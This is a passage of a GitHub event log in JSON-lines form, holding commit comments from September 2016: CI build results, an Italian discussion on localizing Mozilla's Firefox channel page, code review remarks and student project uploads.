Badge](http://img.shields.io/badge/coverage%20status-36.1%25-green.svg)</a>\n"}},"created_at":"2016-09-22T12:28:24Z"}
{"id":"4602123800","type":"CommitCommentEvent","actor":{"login":"gialloporpora"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19129354,"position":11,"line":11,"path":"it/firefox/channel/index.lang","commit_id":"e88d1d139596e8e9d94063b42f588bfc2bfbceb0","created_at":"2016-09-22T12:29:05Z","updated_at":"2016-09-22T12:29:05Z","body":"Addentrati nella giungla?\r\n"}},"created_at":"2016-09-22T12:29:05Z"}
{"id":"4602125388","type":"CommitCommentEvent","actor":{"login":"RainFool"},"repo":{"name":"TokgoLiang/TokgoLiang.github.io"},"payload":{"comment":{"id":19129360,"position":null,"line":null,"path":null,"commit_id":"70ff0522146c386962af88404e2373c96bd3303f","created_at":"2016-09-22T12:29:24Z","updated_at":"2016-09-22T12:29:24Z","body":"哎呦，准备跳槽了？\r\n"}},"created_at":"2016-09-22T12:29:24Z"}
{"id":"4602129611","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19129375,"position":null,"line":null,"path":null,"commit_id":"80007041dec05e28c7522a49ec189403a1c671f0","created_at":"2016-09-22T12:30:15Z","updated_at":"2016-09-22T12:30:15Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1116](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13936&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-22T12:30:15Z"}
{"id":"4602131994","type":"CommitCommentEvent","actor":{"login":"spiveeworks"},"repo":{"name":"spiveeworks/RPGengine"},"payload":{"comment":{"id":19129381,"position":null,"line":null,"path":null,"commit_id":"1769382c09a8b1aec8b85a6f66f519bacd751c56","created_at":"2016-09-22T12:30:43Z","updated_at":"2016-09-22T12:30:43Z","body":"oh lol I just emptied the file in this commit"}},"created_at":"2016-09-22T12:30:43Z"}
{"id":"4602135800","type":"CommitCommentEvent","actor":{"login":"dennis-tra"},"repo":{"name":"finn-christiansen/solidstate"},"payload":{"comment":{"id":19129391,"position":null,"line":null,"path":null,"commit_id":"0265226df51800e2aa4c3f78c8e7c05b8922bb77","created_at":"2016-09-22T12:31:30Z","updated_at":"2016-09-22T12:31:30Z","body":"Ok!"}},"created_at":"2016-09-22T12:31:30Z"}
{"id":"4602141749","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19129407,"position":null,"line":null,"path":null,"commit_id":"eb93d78557e2934a2c66f426302f4855d74e27d8","created_at":"2016-09-22T12:32:46Z","updated_at":"2016-09-22T12:32:46Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1115](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13934&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Tests failed: 1 (1 new), passed: 221, ignored: 3 Build time: 00:10:53\n### Failed tests\n```\norg.genivi.sota.core.transfer.DeviceUpdatesSpec.sets install priority for one package: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-22T12:32:46Z"}
{"id":"4602153008","type":"CommitCommentEvent","actor":{"login":"lifan91"},"repo":{"name":"lifan91/README.md"},"payload":{"comment":{"id":19129438,"position":null,"line":null,"path":null,"commit_id":"c730a7fb5cf05b60d1a4f1c2ca3e1d6ea4075c61","created_at":"2016-09-22T12:35:08Z","updated_at":"2016-09-22T12:35:08Z","body":"oose_0324502\r\n\r\n資管3A 0324502 鄭俐凡"}},"created_at":"2016-09-22T12:35:08Z"}
{"id":"4602156901","type":"CommitCommentEvent","actor":{"login":"ProximoBuild"},"repo":{"name":"NEventStore/NEventStore.Persistence.MongoDB"},"payload":{"comment":{"id":19129446,"position":null,"line":null,"path":null,"commit_id":"eef729fb55c802c4f108fce72aec57d4b42aef30","created_at":"2016-09-22T12:35:56Z","updated_at":"2016-09-22T12:35:56Z","body":"TeamCity NEventStore :: MongoDB :: Build [Build 5.4.0-PullRequest.47+16](http://build.prxm.it:8813/viewLog.html?buildId=3675&buildTypeId=nes_mongo_build&guest=1) outcome was **SUCCESS**\nSummary: Tests passed: 72 Build time: 00:02:52"}},"created_at":"2016-09-22T12:35:56Z"}
{"id":"4602156902","type":"CommitCommentEvent","actor":{"login":"ProximoBuild"},"repo":{"name":"NEventStore/NEventStore.Persistence.MongoDB"},"payload":{"comment":{"id":19129445,"position":null,"line":null,"path":null,"commit_id":"eef729fb55c802c4f108fce72aec57d4b42aef30","created_at":"2016-09-22T12:35:56Z","updated_at":"2016-09-22T12:35:56Z","body":"TeamCity NEventStore :: MongoDB :: Build [Build 5.4.0-PullRequest.47+16](http://build.prxm.it:8813/viewLog.html?buildId=3675&buildTypeId=nes_mongo_build&guest=1) outcome was **SUCCESS**\nSummary: Tests passed: 72 Build time: 00:02:52"}},"created_at":"2016-09-22T12:35:56Z"}
{"id":"4602157755","type":"CommitCommentEvent","actor":{"login":"aeickho"},"repo":{"name":"travisgoodspeed/md380tools"},"payload":{"comment":{"id":19129450,"position":9,"line":274,"path":"applet/merge_d13.020.py","commit_id":"769aa0f823fd3eec25f6b82597bb74468c36b58e","created_at":"2016-09-22T12:36:06Z","updated_at":"2016-09-22T12:36:06Z","body":"@sijskes thanks for the asm file\r\n\r\n@radare the size of bin files 1MB .. \r\n   with your settings i have  seen the first success\r\n\r\nmy radare2 setting:\r\n\r\nhttps://gist.github.com/aeickho/5a8b272dcc3cf66112a48add723b059d\r\n\r\n\r\n"}},"created_at":"2016-09-22T12:36:06Z"}
{"id":"4602161757","type":"CommitCommentEvent","actor":{"login":"flodolo"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19129458,"position":11,"line":11,"path":"it/firefox/channel/index.lang","commit_id":"e88d1d139596e8e9d94063b42f588bfc2bfbceb0","created_at":"2016-09-22T12:36:55Z","updated_at":"2016-09-22T12:36:55Z","body":"Serve qualcosa che sia in qualche modo associabile con il rischio, ma senza connotazioni negative.\r\nLoro giocano su \"Take a walk on the wild side\", non riesco a pensare a niente di simile per l'italiano."}},"created_at":"2016-09-22T12:36:55Z"}
{"id":"4602165966","type":"CommitCommentEvent","actor":{"login":"rindeal"},"repo":{"name":"OpenRC/openrc"},"payload":{"comment":{"id":19129472,"position":7,"line":186,"path":"man/openrc-run.8","commit_id":"66a9788435e51e658e4ae9d3ce0d0e54ea53e4f9","created_at":"2016-09-22T12:37:48Z","updated_at":"2016-09-22T12:37:48Z","body":"There is a typo here"}},"created_at":"2016-09-22T12:37:48Z"}
{"id":"4602169689","type":"CommitCommentEvent","actor":{"login":"ProximoBuild"},"repo":{"name":"NEventStore/NEventStore.Persistence.MongoDB"},"payload":{"comment":{"id":19129482,"position":null,"line":null,"path":null,"commit_id":"eef729fb55c802c4f108fce72aec57d4b42aef30","created_at":"2016-09-22T12:38:36Z","updated_at":"2016-09-22T12:38:36Z","body":"TeamCity NEventStore :: MongoDB :: Build [Build 5.3.6-beta.1](http://build.prxm.it:8813/viewLog.html?buildId=3676&buildTypeId=nes_mongo_build&guest=1) outcome was **SUCCESS**\nSummary: Tests passed: 72 Build time: 00:02:40"}},"created_at":"2016-09-22T12:38:36Z"}
{"id":"4602169698","type":"CommitCommentEvent","actor":{"login":"ProximoBuild"},"repo":{"name":"NEventStore/NEventStore.Persistence.MongoDB"},"payload":{"comment":{"id":19129483,"position":null,"line":null,"path":null,"commit_id":"eef729fb55c802c4f108fce72aec57d4b42aef30","created_at":"2016-09-22T12:38:36Z","updated_at":"2016-09-22T12:38:36Z","body":"TeamCity NEventStore :: MongoDB :: Build [Build 5.3.6-beta.1](http://build.prxm.it:8813/viewLog.html?buildId=3676&buildTypeId=nes_mongo_build&guest=1) outcome was **SUCCESS**\nSummary: Tests passed: 72 Build time: 00:02:40"}},"created_at":"2016-09-22T12:38:36Z"}
{"id":"4602171344","type":"CommitCommentEvent","actor":{"login":"90sihuo"},"repo":{"name":"90sihuo/H5"},"payload":{"comment":{"id":19129487,"position":null,"line":null,"path":null,"commit_id":"bd485fe6e1fc6931884342bfdddab22859f64fd0","created_at":"2016-09-22T12:38:57Z","updated_at":"2016-09-22T12:38:57Z","body":"这是第二次修改"}},"created_at":"2016-09-22T12:38:57Z"}
{"id":"4602176294","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19129500,"position":null,"line":null,"path":null,"commit_id":"80007041dec05e28c7522a49ec189403a1c671f0","created_at":"2016-09-22T12:40:02Z","updated_at":"2016-09-22T12:40:02Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1116](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13936&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 246, ignored: 3 Build time: 00:09:47"}},"created_at":"2016-09-22T12:40:02Z"}
{"id":"4602177530","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19129502,"position":null,"line":null,"path":null,"commit_id":"f2ac9522781cf1a560bb935d4e333fba72de3778","created_at":"2016-09-22T12:40:16Z","updated_at":"2016-09-22T12:40:16Z","body":"Sizing-Simple-Chilled-Ceiling (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1194 of 1194 tests passed, 1 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f2ac9522781cf1a560bb935d4e333fba72de3778-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f2ac9522781cf1a560bb935d4e333fba72de3778-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-f2ac9522781cf1a560bb935d4e333fba72de3778-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-36.11%25-green.svg)</a>\n"}},"created_at":"2016-09-22T12:40:16Z"}
{"id":"4602178844","type":"CommitCommentEvent","actor":{"login":"BattleBroccoli"},"repo":{"name":"BattleBroccoli/BattleBroccoli.github.io"},"payload":{"comment":{"id":19129505,"position":null,"line":null,"path":null,"commit_id":"11a78e85cb2e01b65a37ba1983e1f0e317e11185","created_at":"2016-09-22T12:40:31Z","updated_at":"2016-09-22T12:40:31Z","body":"Hi"}},"created_at":"2016-09-22T12:40:31Z"}
{"id":"4602184972","type":"CommitCommentEvent","actor":{"login":"davekamlesh"},"repo":{"name":"AakashTakale/Medical-Records-System-Software---MRSS"},"payload":{"comment":{"id":19129527,"position":null,"line":null,"path":null,"commit_id":"339d08191481af85e827464f18ea22a791cbf684","created_at":"2016-09-22T12:41:47Z","updated_at":"2016-09-22T12:41:47Z","body":"Can you provide the SQL File?"}},"created_at":"2016-09-22T12:41:47Z"}
{"id":"4602187581","type":"CommitCommentEvent","actor":{"login":"davekamlesh"},"repo":{"name":"AakashTakale/Medical-Records-System-Software---MRSS"},"payload":{"comment":{"id":19129533,"position":null,"line":null,"path":null,"commit_id":"339d08191481af85e827464f18ea22a791cbf684","created_at":"2016-09-22T12:42:19Z","updated_at":"2016-09-22T12:42:19Z","body":"how i will run this without database"}},"created_at":"2016-09-22T12:42:19Z"}
{"id":"4602194236","type":"CommitCommentEvent","actor":{"login":"arseni-baranov"},"repo":{"name":"arseni-baranov/1_typo"},"payload":{"comment":{"id":19129542,"position":null,"line":null,"path":null,"commit_id":"52a144fe8589c04f5af8550b6e4d52e8dd1d3d11","created_at":"2016-09-22T12:43:38Z","updated_at":"2016-09-22T12:43:38Z","body":"исправлена опечатка \"анлийский --> английский\""}},"created_at":"2016-09-22T12:43:38Z"}
{"id":"4602198254","type":"CommitCommentEvent","actor":{"login":"rondoe"},"repo":{"name":"rondoe/node-samlp"},"payload":{"comment":{"id":19129554,"position":416,"line":252,"path":"lib/samlp.js","commit_id":"38158da6cafbd5285d28c272aa6aa3efd8dd384e","created_at":"2016-09-22T12:44:27Z","updated_at":"2016-09-22T12:44:27Z","body":"this is the most important change! audience will be set to issuer"}},"created_at":"2016-09-22T12:44:27Z"}
{"id":"4602198595","type":"CommitCommentEvent","actor":{"login":"gialloporpora"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19129557,"position":11,"line":11,"path":"it/firefox/channel/index.lang","commit_id":"e88d1d139596e8e9d94063b42f588bfc2bfbceb0","created_at":"2016-09-22T12:44:31Z","updated_at":"2016-09-22T12:44:31Z","body":"Sì,  a me veniva in mente la canzone di Lou Reed, la stringa l'avevo \ncapita. Il libro a cui è ispirata in italiano lo hanno tradotto \n“Passeggiata selvaggia”, ma secondo me non rende in italiano Giungla non \nmi sembra abbia connotati negativi. Magari ci penso su forse c'è di meglio.\n\n\n"}},"created_at":"2016-09-22T12:44:31Z"}
{"id":"4602201185","type":"CommitCommentEvent","actor":{"login":"Kauko"},"repo":{"name":"finnishtransportagency/harja"},"payload":{"comment":{"id":19129578,"position":null,"line":null,"path":null,"commit_id":"60dfef3e01455f9e8e2093ee2b62dd9a78cc1705","created_at":"2016-09-22T12:45:03Z","updated_at":"2016-09-22T12:45:03Z","body":"YES"}},"created_at":"2016-09-22T12:45:03Z"}
{"id":"4602204174","type":"CommitCommentEvent","actor":{"login":"Keader"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19129583,"position":null,"line":null,"path":null,"commit_id":"2730576823c6733a6201426019ddca3f7dbba081","created_at":"2016-09-22T12:45:37Z","updated_at":"2016-09-22T12:45:37Z","body":"Fixed in https://github.com/TrinityCore/TrinityCore/commit/0d3432e5a72b2b1e947acf23026218d9df2dccde"}},"created_at":"2016-09-22T12:45:37Z"}
{"id":"4602205200","type":"CommitCommentEvent","actor":{"login":"jamstooks"},"repo":{"name":"AASHE/hub"},"payload":{"comment":{"id":19129585,"position":9,"line":104,"path":"hub/templates/base.html","commit_id":"14a9af5b638571e4d3f30ba92cd4800d9f758b8b","created_at":"2016-09-22T12:45:50Z","updated_at":"2016-09-22T12:45:50Z","body":"Hey @baronvonvaderham, would you mind fixing this so that the footer text is displayed properly?  Looks like you accidentally changed the block content key..."}},"created_at":"2016-09-22T12:45:50Z"}
{"id":"4602212234","type":"CommitCommentEvent","actor":{"login":"MigFerreira"},"repo":{"name":"MigFerreira/nodeeditor"},"payload":{"comment":{"id":19129607,"position":8,"line":52,"path":"src/ConnectionGraphicsObject.cpp","commit_id":"d0f968ca15f21a7b82a708c114c15e85ecec7e6a","created_at":"2016-09-22T12:47:09Z","updated_at":"2016-09-22T12:47:09Z","body":"Well observed. Done.\nOn 22/09/2016 13:25:35, paceholder <notifications@github.com> wrote:\nInstead, I would put the following code to the Connection's destructor.\nif (auto in = _inNode.lock()) { in->nodeGraphicsObject()->update(); } if (auto out = _outNode.lock()) { out->nodeGraphicsObject()->update(); }\nIt updates attached nodes before the node is destroyed.\n—\nYou are receiving this because you authored the thread.\nReply to this email directly, view it on GitHub [https://github.com/MigFerreira/nodeeditor/commit/d0f968ca15f21a7b82a708c114c15e85ecec7e6a#commitcomment-19129304], or mute the thread [https://github.com/notifications/unsubscribe-auth/AAdn-KHuVpKD0mKEAbc6R8EgQR1FmoCNks5qsnO7gaJpZM4KD0wl]."}},"created_at":"2016-09-22T12:47:09Z"}
{"id":"4602215034","type":"CommitCommentEvent","actor":{"login":"gialloporpora"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19129619,"position":11,"line":11,"path":"it/firefox/channel/index.lang","commit_id":"e88d1d139596e8e9d94063b42f588bfc2bfbceb0","created_at":"2016-09-22T12:47:44Z","updated_at":"2016-09-22T12:47:44Z","body":"In italiano, almeno a livello musicale, lasciando perdere i gusti \npersonali, l'analogo è “Voglio una vita spericolata”.\nScegli una navigazione più “spericolata”?\nPerò a me piace di più giungla.\n\n\n"}},"created_at":"2016-09-22T12:47:44Z"}
{"id":"4602219173","type":"CommitCommentEvent","actor":{"login":"murean"},"repo":{"name":"murean/hello-world"},"payload":{"comment":{"id":19129626,"position":null,"line":null,"path":null,"commit_id":"7bbc496206dd021e1d0e58b1e970e8dc5ef92d05","created_at":"2016-09-22T12:48:37Z","updated_at":"2016-09-22T12:48:37Z","body":"Mengapa perlu ditambah?"}},"created_at":"2016-09-22T12:48:37Z"}
{"id":"4602220634","type":"CommitCommentEvent","actor":{"login":"murean"},"repo":{"name":"murean/hello-world"},"payload":{"comment":{"id":19129629,"position":null,"line":null,"path":null,"commit_id":"7bbc496206dd021e1d0e58b1e970e8dc5ef92d05","created_at":"2016-09-22T12:48:55Z","updated_at":"2016-09-22T12:48:55Z","body":"Karena ingin mencoba menambah..."}},"created_at":"2016-09-22T12:48:55Z"}
{"id":"4602235397","type":"CommitCommentEvent","actor":{"login":"patriknw"},"repo":{"name":"akka/akka"},"payload":{"comment":{"id":19129657,"position":58,"line":242,"path":"akka-remote/src/main/scala/akka/remote/serialization/ArteryMessageSerializer.scala","commit_id":"564886f054ade7b16cdec52e97907b92bc8b165d","created_at":"2016-09-22T12:51:48Z","updated_at":"2016-09-22T12:51:48Z","body":"yes, you don't have to send any bytes at all, everything needed is in the manifest"}},"created_at":"2016-09-22T12:51:48Z"}
{"id":"4602238043","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19129666,"position":null,"line":null,"path":null,"commit_id":"a7abb8496558f142ba862cb71187ef69294611da","created_at":"2016-09-22T12:52:19Z","updated_at":"2016-09-22T12:52:19Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1117](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13943&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-22T12:52:19Z"}
{"id":"4602239760","type":"CommitCommentEvent","actor":{"login":"amark97"},"repo":{"name":"amark97/l2-informatique"},"payload":{"comment":{"id":19129671,"position":null,"line":null,"path":null,"commit_id":"c358227743f3c587234e459451b2f5e337086d49","created_at":"2016-09-22T12:52:41Z","updated_at":"2016-09-22T12:52:41Z","body":"Thank you Nassim "}},"created_at":"2016-09-22T12:52:41Z"}
{"id":"4602241243","type":"CommitCommentEvent","actor":{"login":"flodolo"},"repo":{"name":"mozilla-l10n/www.mozilla.org"},"payload":{"comment":{"id":19129675,"position":11,"line":11,"path":"it/firefox/channel/index.lang","commit_id":"e88d1d139596e8e9d94063b42f588bfc2bfbceb0","created_at":"2016-09-22T12:52:59Z","updated_at":"2016-09-22T12:52:59Z","body":"Il concetto di \"navigazione spericolata\" non mi dispiace per nulla"}},"created_at":"2016-09-22T12:52:59Z"}
{"id":"4602244486","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/services"},"payload":{"comment":{"id":19129677,"position":null,"line":null,"path":null,"commit_id":"5921f71b596381cf368a5ee56e4a65d1318b9e4e","created_at":"2016-09-22T12:53:37Z","updated_at":"2016-09-22T12:53:37Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#KFc0yQRqTOiyzvlRozeW-A"}},"created_at":"2016-09-22T12:53:37Z"}
{"id":"4602245313","type":"CommitCommentEvent","actor":{"login":"leif81"},"repo":{"name":"leif81/bzkanban"},"payload":{"comment":{"id":19129678,"position":null,"line":null,"path":null,"commit_id":"3b280ec9e98c7c5ef5bb387e6ee4b2f675b33980","created_at":"2016-09-22T12:53:47Z","updated_at":"2016-09-22T12:53:47Z","body":"Alignment looks much nicer 👍 "}},"created_at":"2016-09-22T12:53:47Z"}
{"id":"4602246554","type":"CommitCommentEvent","actor":{"login":"xBorderie"},"repo":{"name":"PrestaShop/prestashop.github.io"},"payload":{"comment":{"id":19129682,"position":65,"line":59,"path":"news/_posts/2016-09-14-introducing-prestonbot.md","commit_id":"5f2e668424af3533392665e42f3aa1b2e704c332","created_at":"2016-09-22T12:54:01Z","updated_at":"2016-09-22T12:54:01Z","body":"> to help us manage pull requests more effienciently."}},"created_at":"2016-09-22T12:54:01Z"}
{"id":"4602248113","type":"CommitCommentEvent","actor":{"login":"xBorderie"},"repo":{"name":"PrestaShop/prestashop.github.io"},"payload":{"comment":{"id":19129685,"position":67,"line":61,"path":"news/_posts/2016-09-14-introducing-prestonbot.md","commit_id":"5f2e668424af3533392665e42f3aa1b2e704c332","created_at":"2016-09-22T12:54:20Z","updated_at":"2016-09-22T12:54:20Z","body":"> we want PrestonBot to\r\n:)"}},"created_at":"2016-09-22T12:54:20Z"}
{"id":"4602249399","type":"CommitCommentEvent","actor":{"login":"xBorderie"},"repo":{"name":"PrestaShop/prestashop.github.io"},"payload":{"comment":{"id":19129692,"position":68,"line":62,"path":"news/_posts/2016-09-14-introducing-prestonbot.md","commit_id":"5f2e668424af3533392665e42f3aa1b2e704c332","created_at":"2016-09-22T12:54:34Z","updated_at":"2016-09-22T12:54:34Z","body":"we want PrestonBot to\r\n:)"}},"created_at":"2016-09-22T12:54:34Z"}
{"id":"4602250029","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19129694,"position":null,"line":null,"path":null,"commit_id":"77ecbfe6d1b4d427f346cb9e65b0133634d8df40","created_at":"2016-09-22T12:54:40Z","updated_at":"2016-09-22T12:54:40Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1118](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13945&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-22T12:54:40Z"}
{"id":"4602250145","type":"CommitCommentEvent","actor":{"login":"naved1234"},"repo":{"name":"naved1234/Anay-Naved-Suryakant"},"payload":{"comment":{"id":19129695,"position":null,"line":null,"path":null,"commit_id":"7830f98222f2968b6fb12ce01e2c1fba326d4c24","created_at":"2016-09-22T12:54:42Z","updated_at":"2016-09-22T12:54:42Z","body":"[srsupdated.docx](https://github.com/naved1234/Anay-Naved-Suryakant/files/487272/srsupdated.docx)\r\n[Devp_tracebility (1).docx](https://github.com/naved1234/Anay-Naved-Suryakant/files/487278/Devp_tracebility.1.docx)\r\n[feasibility.docx](https://github.com/naved1234/Anay-Naved-Suryakant/files/487277/feasibility.docx)\r\n[Req_tracebility_college_mart.xlsx](https://github.com/naved1234/Anay-Naved-Suryakant/files/487276/Req_tracebility_college_mart.xlsx)\r\n"}},"created_at":"2016-09-22T12:54:42Z"}
{"id":"4602250556","type":"CommitCommentEvent","actor":{"login":"warpech"},"repo":{"name":"StarcounterPrefabs/Images"},"payload":{"comment":{"id":19129696,"position":5,"line":65,"path":"src/Images/wwwroot/Images/elements/so-juicy-filedrop/juicy-filedrop.html","commit_id":"8bb9dc7917a9040124be695ee57663f54230dbc7","created_at":"2016-09-22T12:54:47Z","updated_at":"2016-09-22T12:54:47Z","body":"Why was this property added here? It seems to be completely unused."}},"created_at":"2016-09-22T12:54:47Z"}
{"id":"4602264627","type":"CommitCommentEvent","actor":{"login":"craigsapp"},"repo":{"name":"rism-ch/verovio"},"payload":{"comment":{"id":19129730,"position":null,"line":null,"path":null,"commit_id":"a36ebfe053f0c49f869bf057f2d6fc3f7c2b719f","created_at":"2016-09-22T12:57:31Z","updated_at":"2016-09-22T12:57:31Z","body":"I don't know if this is the correct cmake syntax for adding an include directory (on line 24 of the new file)."}},"created_at":"2016-09-22T12:57:31Z"}
{"id":"4602266425","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-releng/services"},"payload":{"comment":{"id":19129733,"position":null,"line":null,"path":null,"commit_id":"5921f71b596381cf368a5ee56e4a65d1318b9e4e","created_at":"2016-09-22T12:57:53Z","updated_at":"2016-09-22T12:57:53Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#XTAeVCcJR4CKfiYZJtISRA"}},"created_at":"2016-09-22T12:57:53Z"}
{"id":"4602269437","type":"CommitCommentEvent","actor":{"login":"Jain-Sakshi"},"repo":{"name":"NIIT-Software-Engineering/Samaksh-Sibin-Shivam-Yadav-Yash-Tanushree-Sakshi"},"payload":{"comment":{"id":19129740,"position":null,"line":null,"path":null,"commit_id":"53bbf828f5b43ea2bd8bf000c63ab882b0a637fb","created_at":"2016-09-22T12:58:29Z","updated_at":"2016-09-22T12:58:29Z","body":"\r\n[Sakshi Jain.zip](https://github.com/NIIT-Software-Engineering/Samaksh-Sibin-Shivam-Yadav-Yash-Tanushree-Sakshi/files/487294/Sakshi.Jain.zip)\r\n"}},"created_at":"2016-09-22T12:58:29Z"}
{"id":"4602269800","type":"CommitCommentEvent","actor":{"login":"mickaelandrieu"},"repo":{"name":"PrestaShop/prestashop.github.io"},"payload":{"comment":{"id":19129742,"position":68,"line":62,"path":"news/_posts/2016-09-14-introducing-prestonbot.md","commit_id":"5f2e668424af3533392665e42f3aa1b2e704c332","created_at":"2016-09-22T12:58:32Z","updated_at":"2016-09-22T12:58:32Z","body":":innocent: "}},"created_at":"2016-09-22T12:58:32Z"}
{"id":"4602277718","type":"CommitCommentEvent","actor":{"login":"braidn"},"repo":{"name":"glossier/solidus_retail"},"payload":{"comment":{"id":19129753,"position":null,"line":null,"path":null,"commit_id":"946cf50f34c2699606ac874287f0d999b9669ad7","created_at":"2016-09-22T13:00:09Z","updated_at":"2016-09-22T13:00:09Z","body":"This is one commit? One for this many changes? Is it idempotent?"}},"created_at":"2016-09-22T13:00:09Z"}
{"id":"4602288937","type":"CommitCommentEvent","actor":{"login":"GiBeomKim"},"repo":{"name":"GiBeomKim/Android_Application"},"payload":{"comment":{"id":19129780,"position":null,"line":null,"path":null,"commit_id":"4a6ddbc76191dfaf14313e30190c19d0bf4cbcfc","created_at":"2016-09-22T13:02:16Z","updated_at":"2016-09-22T13:02:16Z","body":"https://play.google.com/store/apps/details?id=kr.study.chat_with_chika"}},"created_at":"2016-09-22T13:02:16Z"}
{"id":"4602291356","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19129790,"position":null,"line":null,"path":null,"commit_id":"a7abb8496558f142ba862cb71187ef69294611da","created_at":"2016-09-22T13:02:43Z","updated_at":"2016-09-22T13:02:43Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1117](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13943&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 245, ignored: 3 Build time: 00:10:23"}},"created_at":"2016-09-22T13:02:43Z"}
{"id":"4602298018","type":"CommitCommentEvent","actor":{"login":"blino"},"repo":{"name":"Metrological/WebKitForWayland"},"payload":{"comment":{"id":19129809,"position":null,"line":null,"path":null,"commit_id":"6c4c00eb3ddc5a23f0c837c282d91a0fc3d6e75b","created_at":"2016-09-22T13:03:58Z","updated_at":"2016-09-22T13:03:58Z","body":"Can this be made conditional to allow build with both older and 16.2 refsw?"}},"created_at":"2016-09-22T13:03:58Z"}
{"id":"4602298200","type":"CommitCommentEvent","actor":{"login":"sandipagarwal"},"repo":{"name":"JoshLabs/git-pylint-commit-hook"},"payload":{"comment":{"id":19129810,"position":null,"line":null,"path":null,"commit_id":"b3a6de56caf3c30abd38a57bd1bdb98816d5efea","created_at":"2016-09-22T13:04:00Z","updated_at":"2016-09-22T13:04:00Z","body":"@sebdah While updating the version, we should update it [here](https://github.com/sebdah/git-pylint-commit-hook/blob/master/git_pylint_commit_hook/settings.conf#L2) as well.\r\n\r\nIf not, we have no use mentioning it there."}},"created_at":"2016-09-22T13:04:00Z"}
{"id":"4602301165","type":"CommitCommentEvent","actor":{"login":"maximeguerreiro"},"repo":{"name":"ovh/overthebox-feeds"},"payload":{"comment":{"id":19129820,"position":null,"line":null,"path":null,"commit_id":"394dae266217e7f5a898ca10e6f8f529a6c945d3","created_at":"2016-09-22T13:04:34Z","updated_at":"2016-09-22T13:04:34Z","body":":+1: "}},"created_at":"2016-09-22T13:04:34Z"}
{"id":"4602302995","type":"CommitCommentEvent","actor":{"login":"Turbovix"},"repo":{"name":"tananaev/traccar"},"payload":{"comment":{"id":19129822,"position":null,"line":null,"path":null,"commit_id":"80bbc136baf6a91b967732fdae4238f827b9bf19","created_at":"2016-09-22T13:04:54Z","updated_at":"2016-09-22T13:04:54Z","body":"@tananaev just not commenting. the code below, enables the function module to control 2 output module, in which case geralemnte is used for the alarm."}},"created_at":"2016-09-22T13:04:54Z"}
